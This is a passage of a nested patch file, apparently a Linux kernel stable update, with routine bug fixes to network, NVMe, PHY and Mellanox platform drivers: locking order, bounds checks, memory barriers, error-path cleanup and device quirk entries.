+--- a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+@@ -1312,7 +1312,7 @@ static enum xgbe_mode xgbe_phy_status_aneg(struct xgbe_prv_data *pdata)
+ 	return pdata->phy_if.phy_impl.an_outcome(pdata);
+ }
+ 
+-static void xgbe_phy_status_result(struct xgbe_prv_data *pdata)
++static bool xgbe_phy_status_result(struct xgbe_prv_data *pdata)
+ {
+ 	struct ethtool_link_ksettings *lks = &pdata->phy.lks;
+ 	enum xgbe_mode mode;
+@@ -1347,8 +1347,13 @@ static void xgbe_phy_status_result(struct xgbe_prv_data *pdata)
+ 
+ 	pdata->phy.duplex = DUPLEX_FULL;
+ 
+-	if (xgbe_set_mode(pdata, mode) && pdata->an_again)
++	if (!xgbe_set_mode(pdata, mode))
++		return false;
++
++	if (pdata->an_again)
+ 		xgbe_phy_reconfig_aneg(pdata);
++
++	return true;
+ }
+ 
+ static void xgbe_phy_status(struct xgbe_prv_data *pdata)
+@@ -1378,7 +1383,8 @@ static void xgbe_phy_status(struct xgbe_prv_data *pdata)
+ 			return;
+ 		}
+ 
+-		xgbe_phy_status_result(pdata);
++		if (xgbe_phy_status_result(pdata))
++			return;
+ 
+ 		if (test_bit(XGBE_LINK_INIT, &pdata->dev_state))
+ 			clear_bit(XGBE_LINK_INIT, &pdata->dev_state);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index d7b2ee5de1158..c4e40834e3ff9 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -483,7 +483,7 @@ static void poll_trace(struct mlx5_fw_tracer *tracer,
+ 				(u64)timestamp_low;
+ 		break;
+ 	default:
+-		if (tracer_event->event_id >= tracer->str_db.first_string_trace ||
++		if (tracer_event->event_id >= tracer->str_db.first_string_trace &&
+ 		    tracer_event->event_id <= tracer->str_db.first_string_trace +
+ 					      tracer->str_db.num_string_trace) {
+ 			tracer_event->type = TRACER_EVENT_TYPE_STRING;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_common.c b/drivers/net/ethernet/mellanox/mlx5/core/en_common.c
+index 68f19324db93c..03a99918a8942 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_common.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_common.c
+@@ -139,10 +139,8 @@ int mlx5e_refresh_tirs(struct mlx5e_priv *priv, bool enable_uc_lb,
+ 
+ 	inlen = MLX5_ST_SZ_BYTES(modify_tir_in);
+ 	in = kvzalloc(inlen, GFP_KERNEL);
+-	if (!in) {
+-		err = -ENOMEM;
+-		goto out;
+-	}
++	if (!in)
++		return -ENOMEM;
+ 
+ 	if (enable_uc_lb)
+ 		lb_flags = MLX5_TIRC_SELF_LB_BLOCK_BLOCK_UNICAST;
+@@ -160,14 +158,13 @@ int mlx5e_refresh_tirs(struct mlx5e_priv *priv, bool enable_uc_lb,
+ 		tirn = tir->tirn;
+ 		err = mlx5_core_modify_tir(mdev, tirn, in);
+ 		if (err)
+-			goto out;
++			break;
+ 	}
++	mutex_unlock(&mdev->mlx5e_res.hw_objs.td.list_lock);
+ 
+-out:
+ 	kvfree(in);
+ 	if (err)
+ 		netdev_err(priv->netdev, "refresh tir(0x%x) failed, %d\n", tirn, err);
+-	mutex_unlock(&mdev->mlx5e_res.hw_objs.td.list_lock);
+ 
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 94d010e2d5efd..4e7daa382bc05 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -5745,8 +5745,8 @@ void mlx5e_detach_netdev(struct mlx5e_priv *priv)
+ }
+ 
+ static int
+-mlx5e_netdev_attach_profile(struct net_device *netdev, struct mlx5_core_dev *mdev,
+-			    const struct mlx5e_profile *new_profile, void *new_ppriv)
++mlx5e_netdev_init_profile(struct net_device *netdev, struct mlx5_core_dev *mdev,
++			  const struct mlx5e_profile *new_profile, void *new_ppriv)
+ {
+ 	struct mlx5e_priv *priv = netdev_priv(netdev);
+ 	int err;
+@@ -5762,6 +5762,25 @@ mlx5e_netdev_attach_profile(struct net_device *netdev, struct mlx5_core_dev *mde
+ 	err = new_profile->init(priv->mdev, priv->netdev);
+ 	if (err)
+ 		goto priv_cleanup;
++
++	return 0;
++
++priv_cleanup:
++	mlx5e_priv_cleanup(priv);
++	return err;
++}
++
++static int
++mlx5e_netdev_attach_profile(struct net_device *netdev, struct mlx5_core_dev *mdev,
++			    const struct mlx5e_profile *new_profile, void *new_ppriv)
++{
++	struct mlx5e_priv *priv = netdev_priv(netdev);
++	int err;
++
++	err = mlx5e_netdev_init_profile(netdev, mdev, new_profile, new_ppriv);
++	if (err)
++		return err;
++
+ 	err = mlx5e_attach_netdev(priv);
+ 	if (err)
+ 		goto profile_cleanup;
+@@ -5769,7 +5788,6 @@ mlx5e_netdev_attach_profile(struct net_device *netdev, struct mlx5_core_dev *mde
+ 
+ profile_cleanup:
+ 	new_profile->cleanup(priv);
+-priv_cleanup:
+ 	mlx5e_priv_cleanup(priv);
+ 	return err;
+ }
+@@ -5788,6 +5806,12 @@ int mlx5e_netdev_change_profile(struct mlx5e_priv *priv,
+ 	priv->profile->cleanup(priv);
+ 	mlx5e_priv_cleanup(priv);
+ 
++	if (mdev->state == MLX5_DEVICE_STATE_INTERNAL_ERROR) {
++		mlx5e_netdev_init_profile(netdev, mdev, new_profile, new_ppriv);
++		set_bit(MLX5E_STATE_DESTROYING, &priv->state);
++		return -EIO;
++	}
++
+ 	err = mlx5e_netdev_attach_profile(netdev, mdev, new_profile, new_ppriv);
+ 	if (err) { /* roll back to original profile */
+ 		netdev_warn(netdev, "%s: new profile init failed, %d\n", __func__, err);
+@@ -5847,8 +5871,11 @@ static int mlx5e_suspend(struct auxiliary_device *adev, pm_message_t state)
+ 	struct net_device *netdev = priv->netdev;
+ 	struct mlx5_core_dev *mdev = priv->mdev;
+ 
+-	if (!netif_device_present(netdev))
++	if (!netif_device_present(netdev)) {
++		if (test_bit(MLX5E_STATE_DESTROYING, &priv->state))
++			mlx5e_destroy_mdev_resources(mdev);
+ 		return -ENODEV;
++	}
+ 
+ 	mlx5e_detach_netdev(priv);
+ 	mlx5e_destroy_mdev_resources(mdev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 91724c5450a05..077204929fe4a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -896,7 +896,6 @@ static int mlx5_pci_init(struct mlx5_core_dev *dev, struct pci_dev *pdev,
+ 	}
+ 
+ 	mlx5_pci_vsc_init(dev);
+-	dev->caps.embedded_cpu = mlx5_read_embedded_cpu(dev);
+ 	return 0;
+ 
+ err_clr_master:
+@@ -1130,6 +1129,7 @@ static int mlx5_function_setup(struct mlx5_core_dev *dev, bool boot, u64 timeout
+ 		goto err_cmd_cleanup;
+ 	}
+ 
++	dev->caps.embedded_cpu = mlx5_read_embedded_cpu(dev);
+ 	mlx5_cmd_set_state(dev, MLX5_CMDIF_STATE_UP);
+ 
+ 	mlx5_start_health_poll(dev);
+@@ -1753,14 +1753,15 @@ static void remove_one(struct pci_dev *pdev)
+ 	struct devlink *devlink = priv_to_devlink(dev);
+ 
+ 	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+-	/* mlx5_drain_fw_reset() is using devlink APIs. Hence, we must drain
+-	 * fw_reset before unregistering the devlink.
++	/* mlx5_drain_fw_reset() and mlx5_drain_health_wq() are using
++	 * devlink notify APIs.
++	 * Hence, we must drain them before unregistering the devlink.
+ 	 */
+ 	mlx5_drain_fw_reset(dev);
++	mlx5_drain_health_wq(dev);
+ 	devlink_unregister(devlink);
+ 	mlx5_sriov_disable(pdev);
+ 	mlx5_crdump_disable(dev);
+-	mlx5_drain_health_wq(dev);
+ 	mlx5_uninit_one(dev);
+ 	mlx5_pci_close(dev);
+ 	mlx5_mdev_uninit(dev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+index a7377619ba6f2..2424cdf9cca99 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+@@ -63,6 +63,7 @@ static void mlx5_sf_dev_remove(struct auxiliary_device *adev)
+ 	struct mlx5_sf_dev *sf_dev = container_of(adev, struct mlx5_sf_dev, adev);
+ 	struct devlink *devlink = priv_to_devlink(sf_dev->mdev);
+ 
++	mlx5_drain_health_wq(sf_dev->mdev);
+ 	devlink_unregister(devlink);
+ 	mlx5_uninit_one(sf_dev->mdev);
+ 	iounmap(sf_dev->mdev->iseg);
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+index afa3b92a6905f..0d5a41a2ae010 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+@@ -245,12 +245,6 @@ static bool mlxbf_gige_rx_packet(struct mlxbf_gige *priv, int *rx_pkts)
+ 
+ 		skb = priv->rx_skb[rx_pi_rem];
+ 
+-		skb_put(skb, datalen);
+-
+-		skb->ip_summed = CHECKSUM_NONE; /* device did not checksum packet */
+-
+-		skb->protocol = eth_type_trans(skb, netdev);
+-
+ 		/* Alloc another RX SKB for this same index */
+ 		rx_skb = mlxbf_gige_alloc_skb(priv, MLXBF_GIGE_DEFAULT_BUF_SZ,
+ 					      &rx_buf_dma, DMA_FROM_DEVICE);
+@@ -259,6 +253,13 @@ static bool mlxbf_gige_rx_packet(struct mlxbf_gige *priv, int *rx_pkts)
+ 		priv->rx_skb[rx_pi_rem] = rx_skb;
+ 		dma_unmap_single(priv->dev, *rx_wqe_addr,
+ 				 MLXBF_GIGE_DEFAULT_BUF_SZ, DMA_FROM_DEVICE);
++
++		skb_put(skb, datalen);
++
++		skb->ip_summed = CHECKSUM_NONE; /* device did not checksum packet */
++
++		skb->protocol = eth_type_trans(skb, netdev);
++
+ 		*rx_wqe_addr = rx_buf_dma;
+ 	} else if (rx_cqe & MLXBF_GIGE_RX_CQE_PKT_STATUS_MAC_ERR) {
+ 		priv->stats.rx_mac_errors++;
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 2cc28af52ee25..45c2585011351 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1324,7 +1324,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_FIXED_INTF(0x2001, 0x7e3d, 4)},	/* D-Link DWM-222 A2 */
+ 	{QMI_FIXED_INTF(0x2020, 0x2031, 4)},	/* Olicard 600 */
+ 	{QMI_FIXED_INTF(0x2020, 0x2033, 4)},	/* BroadMobi BM806U */
+-	{QMI_FIXED_INTF(0x2020, 0x2060, 4)},	/* BroadMobi BM818 */
++	{QMI_QUIRK_SET_DTR(0x2020, 0x2060, 4)},	/* BroadMobi BM818 */
+ 	{QMI_FIXED_INTF(0x0f3d, 0x68a2, 8)},    /* Sierra Wireless MC7700 */
+ 	{QMI_FIXED_INTF(0x114f, 0x68a2, 8)},    /* Sierra Wireless MC7750 */
+ 	{QMI_FIXED_INTF(0x1199, 0x68a2, 8)},	/* Sierra Wireless MC7710 in QMI mode */
+diff --git a/drivers/net/wireless/broadcom/b43/b43.h b/drivers/net/wireless/broadcom/b43/b43.h
+index 9fc7c088a539e..67b4bac048e58 100644
+--- a/drivers/net/wireless/broadcom/b43/b43.h
++++ b/drivers/net/wireless/broadcom/b43/b43.h
+@@ -651,7 +651,7 @@ struct b43_iv {
+ 	union {
+ 		__be16 d16;
+ 		__be32 d32;
+-	} data __packed;
++	} __packed data;
+ } __packed;
+ 
+ 
+diff --git a/drivers/net/wireless/broadcom/b43legacy/b43legacy.h b/drivers/net/wireless/broadcom/b43legacy/b43legacy.h
+index 6b0cec467938f..f49365d14619f 100644
+--- a/drivers/net/wireless/broadcom/b43legacy/b43legacy.h
++++ b/drivers/net/wireless/broadcom/b43legacy/b43legacy.h
+@@ -379,7 +379,7 @@ struct b43legacy_iv {
+ 	union {
+ 		__be16 d16;
+ 		__be32 d32;
+-	} data __packed;
++	} __packed data;
+ } __packed;
+ 
+ #define B43legacy_PHYMODE(phytype)	(1 << (phytype))
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rs.c b/drivers/net/wireless/intel/iwlwifi/mvm/rs.c
+index 0b50b816684a0..2be6801d48aca 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rs.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rs.c
+@@ -2692,6 +2692,8 @@ static void rs_drv_get_rate(void *mvm_r, struct ieee80211_sta *sta,
+ 		return;
+ 
+ 	lq_sta = mvm_sta;
++
++	spin_lock(&lq_sta->pers.lock);
+ 	iwl_mvm_hwrate_to_tx_rate_v1(lq_sta->last_rate_n_flags,
+ 				     info->band, &info->control.rates[0]);
+ 	info->control.rates[0].count = 1;
+@@ -2706,6 +2708,7 @@ static void rs_drv_get_rate(void *mvm_r, struct ieee80211_sta *sta,
+ 		iwl_mvm_hwrate_to_tx_rate_v1(last_ucode_rate, info->band,
+ 					     &txrc->reported_rate);
+ 	}
++	spin_unlock(&lq_sta->pers.lock);
+ }
+ 
+ static void *rs_drv_alloc_sta(void *mvm_rate, struct ieee80211_sta *sta,
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
+index 1ba66b8f70c95..cda3b802e89dd 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
+@@ -1346,6 +1346,7 @@ struct rtl8xxxu_priv {
+ 	u32 rege9c;
+ 	u32 regeb4;
+ 	u32 regebc;
++	u32 regrcr;
+ 	int next_mbox;
+ 	int nr_out_eps;
+ 
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index 95c0150f23569..3a9fa3ff37acc 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -4049,6 +4049,7 @@ static int rtl8xxxu_init_device(struct ieee80211_hw *hw)
+ 		RCR_ACCEPT_MGMT_FRAME | RCR_HTC_LOC_CTRL |
+ 		RCR_APPEND_PHYSTAT | RCR_APPEND_ICV | RCR_APPEND_MIC;
+ 	rtl8xxxu_write32(priv, REG_RCR, val32);
++	priv->regrcr = val32;
+ 
+ 	/*
+ 	 * Accept all multicast
+@@ -6058,7 +6059,7 @@ static void rtl8xxxu_configure_filter(struct ieee80211_hw *hw,
+ 				      unsigned int *total_flags, u64 multicast)
+ {
+ 	struct rtl8xxxu_priv *priv = hw->priv;
+-	u32 rcr = rtl8xxxu_read32(priv, REG_RCR);
++	u32 rcr = priv->regrcr;
+ 
+ 	dev_dbg(&priv->udev->dev, "%s: changed_flags %08x, total_flags %08x\n",
+ 		__func__, changed_flags, *total_flags);
+@@ -6104,6 +6105,7 @@ static void rtl8xxxu_configure_filter(struct ieee80211_hw *hw,
+ 	 */
+ 
+ 	rtl8xxxu_write32(priv, REG_RCR, rcr);
++	priv->regrcr = rcr;
+ 
+ 	*total_flags &= (FIF_ALLMULTI | FIF_FCSFAIL | FIF_BCN_PRBRESP_PROMISC |
+ 			 FIF_CONTROL | FIF_OTHER_BSS | FIF_PSPOLL |
+diff --git a/drivers/net/wwan/t7xx/t7xx_pci.c b/drivers/net/wwan/t7xx/t7xx_pci.c
+index 226fc1703e90f..91256e005b846 100644
+--- a/drivers/net/wwan/t7xx/t7xx_pci.c
++++ b/drivers/net/wwan/t7xx/t7xx_pci.c
+@@ -45,6 +45,7 @@
+ #define T7XX_PCI_IREG_BASE		0
+ #define T7XX_PCI_EREG_BASE		2
+ 
++#define T7XX_INIT_TIMEOUT		20
+ #define PM_SLEEP_DIS_TIMEOUT_MS		20
+ #define PM_ACK_TIMEOUT_MS		1500
+ #define PM_AUTOSUSPEND_MS		20000
+@@ -96,6 +97,7 @@ static int t7xx_pci_pm_init(struct t7xx_pci_dev *t7xx_dev)
+ 	spin_lock_init(&t7xx_dev->md_pm_lock);
+ 	init_completion(&t7xx_dev->sleep_lock_acquire);
+ 	init_completion(&t7xx_dev->pm_sr_ack);
++	init_completion(&t7xx_dev->init_done);
+ 	atomic_set(&t7xx_dev->md_pm_state, MTK_PM_INIT);
+ 
+ 	device_init_wakeup(&pdev->dev, true);
+@@ -124,6 +126,7 @@ void t7xx_pci_pm_init_late(struct t7xx_pci_dev *t7xx_dev)
+ 	pm_runtime_mark_last_busy(&t7xx_dev->pdev->dev);
+ 	pm_runtime_allow(&t7xx_dev->pdev->dev);
+ 	pm_runtime_put_noidle(&t7xx_dev->pdev->dev);
++	complete_all(&t7xx_dev->init_done);
+ }
+ 
+ static int t7xx_pci_pm_reinit(struct t7xx_pci_dev *t7xx_dev)
+@@ -529,6 +532,20 @@ static void t7xx_pci_shutdown(struct pci_dev *pdev)
+ 	__t7xx_pci_pm_suspend(pdev);
+ }
+ 
++static int t7xx_pci_pm_prepare(struct device *dev)
++{
++	struct pci_dev *pdev = to_pci_dev(dev);
++	struct t7xx_pci_dev *t7xx_dev;
++
++	t7xx_dev = pci_get_drvdata(pdev);
++	if (!wait_for_completion_timeout(&t7xx_dev->init_done, T7XX_INIT_TIMEOUT * HZ)) {
++		dev_warn(dev, "Not ready for system sleep.\n");
++		return -ETIMEDOUT;
++	}
++
++	return 0;
++}
++
+ static int t7xx_pci_pm_suspend(struct device *dev)
+ {
+ 	return __t7xx_pci_pm_suspend(to_pci_dev(dev));
+@@ -555,6 +572,7 @@ static int t7xx_pci_pm_runtime_resume(struct device *dev)
+ }
+ 
+ static const struct dev_pm_ops t7xx_pci_pm_ops = {
++	.prepare = t7xx_pci_pm_prepare,
+ 	.suspend = t7xx_pci_pm_suspend,
+ 	.resume = t7xx_pci_pm_resume,
+ 	.resume_noirq = t7xx_pci_pm_resume_noirq,
+diff --git a/drivers/net/wwan/t7xx/t7xx_pci.h b/drivers/net/wwan/t7xx/t7xx_pci.h
+index 50b37056ce5a4..5dffe24ef37b4 100644
+--- a/drivers/net/wwan/t7xx/t7xx_pci.h
++++ b/drivers/net/wwan/t7xx/t7xx_pci.h
+@@ -69,6 +69,7 @@ struct t7xx_pci_dev {
+ 	struct t7xx_modem	*md;
+ 	struct t7xx_ccmni_ctrl	*ccmni_ctlb;
+ 	bool			rgu_pci_irq_en;
++	struct completion	init_done;
+ 
+ 	/* Low Power Items */
+ 	struct list_head	md_pm_entities;
+diff --git a/drivers/nvme/host/constants.c b/drivers/nvme/host/constants.c
+index e958d50155857..5766ceba2fec9 100644
+--- a/drivers/nvme/host/constants.c
++++ b/drivers/nvme/host/constants.c
+@@ -21,7 +21,7 @@ static const char * const nvme_ops[] = {
+ 	[nvme_cmd_resv_release] = "Reservation Release",
+ 	[nvme_cmd_zone_mgmt_send] = "Zone Management Send",
+ 	[nvme_cmd_zone_mgmt_recv] = "Zone Management Receive",
+-	[nvme_cmd_zone_append] = "Zone Management Append",
++	[nvme_cmd_zone_append] = "Zone Append",
+ };
+ 
+ static const char * const nvme_admin_ops[] = {
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index f502e032e7e46..2e22c78991ccf 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -3540,6 +3540,9 @@ static ssize_t nvme_sysfs_delete(struct device *dev,
+ {
+ 	struct nvme_ctrl *ctrl = dev_get_drvdata(dev);
+ 
++	if (!test_bit(NVME_CTRL_STARTED_ONCE, &ctrl->flags))
++		return -EBUSY;
++
+ 	if (device_remove_file_self(dev, attr))
+ 		nvme_delete_ctrl_sync(ctrl);
+ 	return count;
+@@ -4980,7 +4983,7 @@ void nvme_start_ctrl(struct nvme_ctrl *ctrl)
+ 	 * that were missed. We identify persistent discovery controllers by
+ 	 * checking that they started once before, hence are reconnecting back.
+ 	 */
+-	if (test_and_set_bit(NVME_CTRL_STARTED_ONCE, &ctrl->flags) &&
++	if (test_bit(NVME_CTRL_STARTED_ONCE, &ctrl->flags) &&
+ 	    nvme_discovery_ctrl(ctrl))
+ 		nvme_change_uevent(ctrl, "NVME_EVENT=rediscover");
+ 
+@@ -4991,6 +4994,7 @@ void nvme_start_ctrl(struct nvme_ctrl *ctrl)
+ 	}
+ 
+ 	nvme_change_uevent(ctrl, "NVME_EVENT=connected");
++	set_bit(NVME_CTRL_STARTED_ONCE, &ctrl->flags);
+ }
+ EXPORT_SYMBOL_GPL(nvme_start_ctrl);
+ 
+diff --git a/drivers/nvme/host/hwmon.c b/drivers/nvme/host/hwmon.c
+index 9e6e56c20ec99..316f3e4ca7cc6 100644
+--- a/drivers/nvme/host/hwmon.c
++++ b/drivers/nvme/host/hwmon.c
+@@ -163,7 +163,9 @@ static umode_t nvme_hwmon_is_visible(const void *_data,
+ 	case hwmon_temp_max:
+ 	case hwmon_temp_min:
+ 		if ((!channel && data->ctrl->wctemp) ||
+-		    (channel && data->log->temp_sensor[channel - 1])) {
++		    (channel && data->log->temp_sensor[channel - 1] &&
++		     !(data->ctrl->quirks &
++		       NVME_QUIRK_NO_SECONDARY_TEMP_THRESH))) {
+ 			if (data->ctrl->quirks &
+ 			    NVME_QUIRK_NO_TEMP_THRESH_CHANGE)
+ 				return 0444;
+diff --git a/drivers/nvme/host/multipath.c b/drivers/nvme/host/multipath.c
+index d09ed00701743..f96d330d39641 100644
+--- a/drivers/nvme/host/multipath.c
++++ b/drivers/nvme/host/multipath.c
+@@ -858,7 +858,6 @@ void nvme_mpath_remove_disk(struct nvme_ns_head *head)
+ {
+ 	if (!head->disk)
+ 		return;
+-	blk_mark_disk_dead(head->disk);
+ 	/* make sure all pending bios are cleaned up */
+ 	kblockd_schedule_work(&head->requeue_work);
+ 	flush_work(&head->requeue_work);
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 01d90424af534..3f82de6060ef7 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -149,6 +149,11 @@ enum nvme_quirks {
+ 	 * Reports garbage in the namespace identifiers (eui64, nguid, uuid).
+ 	 */
+ 	NVME_QUIRK_BOGUS_NID			= (1 << 18),
++
++	/*
++	 * No temperature thresholds for channels other than 0 (Composite).
++	 */
++	NVME_QUIRK_NO_SECONDARY_TEMP_THRESH	= (1 << 19),
+ };
+ 
+ /*
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 581bf94416e6d..ba4903c86f7ff 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3515,6 +3515,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_NO_DEEPEST_PS, },
+ 	{ PCI_DEVICE(0x2646, 0x2263),   /* KINGSTON A2000 NVMe SSD  */
+ 		.driver_data = NVME_QUIRK_NO_DEEPEST_PS, },
++	{ PCI_DEVICE(0x2646, 0x5013),   /* Kingston KC3000, Kingston FURY Renegade */
++		.driver_data = NVME_QUIRK_NO_SECONDARY_TEMP_THRESH, },
+ 	{ PCI_DEVICE(0x2646, 0x5018),   /* KINGSTON OM8SFP4xxxxP OS21012 NVMe SSD */
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
+ 	{ PCI_DEVICE(0x2646, 0x5016),   /* KINGSTON OM3PGP4xxxxP OS21011 NVMe SSD */
+@@ -3554,6 +3556,10 @@ static const struct pci_device_id nvme_id_table[] = {
+ 				NVME_QUIRK_IGNORE_DEV_SUBNQN, },
+ 	{ PCI_DEVICE(0x10ec, 0x5763), /* TEAMGROUP T-FORCE CARDEA ZERO Z330 SSD */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x1e4b, 0x1602), /* HS-SSD-FUTURE 2048G  */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x10ec, 0x5765), /* TEAMGROUP MP33 2TB SSD */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0061),
+ 		.driver_data = NVME_QUIRK_DMA_ADDRESS_BITS_48, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0065),
+diff --git a/drivers/phy/amlogic/phy-meson-g12a-mipi-dphy-analog.c b/drivers/phy/amlogic/phy-meson-g12a-mipi-dphy-analog.c
+index c14089fa7db49..cabdddbbabfd7 100644
+--- a/drivers/phy/amlogic/phy-meson-g12a-mipi-dphy-analog.c
++++ b/drivers/phy/amlogic/phy-meson-g12a-mipi-dphy-analog.c
+@@ -70,7 +70,7 @@ static int phy_g12a_mipi_dphy_analog_power_on(struct phy *phy)
+ 		     HHI_MIPI_CNTL1_BANDGAP);
+ 
+ 	regmap_write(priv->regmap, HHI_MIPI_CNTL2,
+-		     FIELD_PREP(HHI_MIPI_CNTL2_DIF_TX_CTL0, 0x459) |
++		     FIELD_PREP(HHI_MIPI_CNTL2_DIF_TX_CTL0, 0x45a) |
+ 		     FIELD_PREP(HHI_MIPI_CNTL2_DIF_TX_CTL1, 0x2680));
+ 
+ 	reg = DSI_LANE_CLK;
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+index 816829105135e..8c527c4927fd1 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+@@ -1993,7 +1993,7 @@ static int qmp_combo_com_init(struct qmp_phy *qphy)
+ 	ret = regulator_bulk_enable(cfg->num_vregs, qmp->vregs);
+ 	if (ret) {
+ 		dev_err(qmp->dev, "failed to enable regulators, err=%d\n", ret);
+-		goto err_unlock;
++		goto err_decrement_count;
+ 	}
+ 
+ 	ret = reset_control_bulk_assert(cfg->num_resets, qmp->resets);
+@@ -2048,7 +2048,8 @@ err_assert_reset:
+ 	reset_control_bulk_assert(cfg->num_resets, qmp->resets);
+ err_disable_regulators:
+ 	regulator_bulk_disable(cfg->num_vregs, qmp->vregs);
+-err_unlock:
++err_decrement_count:
++	qmp->init_count--;
+ 	mutex_unlock(&qmp->phy_mutex);
+ 
+ 	return ret;
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcie-msm8996.c b/drivers/phy/qualcomm/phy-qcom-qmp-pcie-msm8996.c
+index 461f0b5d464a8..31c223a54394a 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-pcie-msm8996.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcie-msm8996.c
+@@ -425,7 +425,7 @@ static int qmp_pcie_msm8996_com_init(struct qmp_phy *qphy)
+ 	ret = regulator_bulk_enable(cfg->num_vregs, qmp->vregs);
+ 	if (ret) {
+ 		dev_err(qmp->dev, "failed to enable regulators, err=%d\n", ret);
+-		goto err_unlock;
++		goto err_decrement_count;
+ 	}
+ 
+ 	ret = reset_control_bulk_assert(cfg->num_resets, qmp->resets);
+@@ -455,7 +455,8 @@ err_assert_reset:
+ 	reset_control_bulk_assert(cfg->num_resets, qmp->resets);
+ err_disable_regulators:
+ 	regulator_bulk_disable(cfg->num_vregs, qmp->vregs);
+-err_unlock:
++err_decrement_count:
++	qmp->init_count--;
+ 	mutex_unlock(&qmp->phy_mutex);
+ 
+ 	return ret;
+diff --git a/drivers/platform/mellanox/mlxbf-tmfifo.c b/drivers/platform/mellanox/mlxbf-tmfifo.c
+index 1ae3c56b66b09..b2e19f30a928b 100644
+--- a/drivers/platform/mellanox/mlxbf-tmfifo.c
++++ b/drivers/platform/mellanox/mlxbf-tmfifo.c
+@@ -765,7 +765,7 @@ static void mlxbf_tmfifo_rxtx(struct mlxbf_tmfifo_vring *vring, bool is_rx)
+ 	fifo = vring->fifo;
+ 
+ 	/* Return if vdev is not ready. */
+-	if (!fifo->vdev[devid])
++	if (!fifo || !fifo->vdev[devid])
+ 		return;
+ 
+ 	/* Return if another vring is running. */
+@@ -961,9 +961,13 @@ static int mlxbf_tmfifo_virtio_find_vqs(struct virtio_device *vdev,
+ 
+ 		vq->num_max = vring->num;
+ 
++		vq->priv = vring;
++
++		/* Make vq update visible before using it. */
++		virtio_mb(false);
++
+ 		vqs[i] = vq;
+ 		vring->vq = vq;
+-		vq->priv = vring;
+ 	}
+ 
+ 	return 0;
+@@ -1260,6 +1264,9 @@ static int mlxbf_tmfifo_probe(struct platform_device *pdev)
+ 
+ 	mod_timer(&fifo->timer, jiffies + MLXBF_TMFIFO_TIMER_INTERVAL);
+ 
++	/* Make all updates visible before setting the 'is_ready' flag. */
++	virtio_mb(false);
++
+ 	fifo->is_ready = true;
+ 	return 0;
+ 
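
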